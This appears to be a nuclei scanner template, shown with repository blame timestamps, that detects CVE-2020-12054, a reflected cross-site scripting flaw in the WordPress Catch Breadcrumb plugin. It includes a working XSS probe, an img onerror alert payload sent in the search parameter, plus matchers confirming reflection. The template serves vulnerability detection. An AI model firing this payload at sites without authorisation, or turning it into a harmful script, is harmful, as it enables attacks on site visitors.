nuclei-templates/http/cves/2020/CVE-2020-12054.yaml

51 lines
1.7 KiB
YAML
Raw Normal View History

2021-07-15 11:27:45 +00:00
id: CVE-2020-12054
info:
name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting
2021-07-15 11:27:45 +00:00
author: daffainfo
severity: medium
description: |
WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
reference:
- https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
- https://wpvulndb.com/vulnerabilities/10184
- https://cxsecurity.com/issue/WLB-2020040144
- https://nvd.nist.gov/vuln/detail/CVE-2020-12054
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-12054
cwe-id: CWE-79
epss-score: 0.00129
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.46935
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: catchplugins
product: catch_breadcrumb
tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020
2021-07-15 11:27:45 +00:00
http:
2021-07-15 11:27:45 +00:00
- method: GET
path:
2021-07-19 18:25:15 +00:00
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
2021-07-15 11:27:45 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-07-15 11:27:45 +00:00
words:
2021-07-19 18:25:15 +00:00
- "<img src=x onerror=alert(123);>"
2021-07-16 20:37:26 +00:00
- "catch-breadcrumb"
condition: and
2021-07-15 11:27:45 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200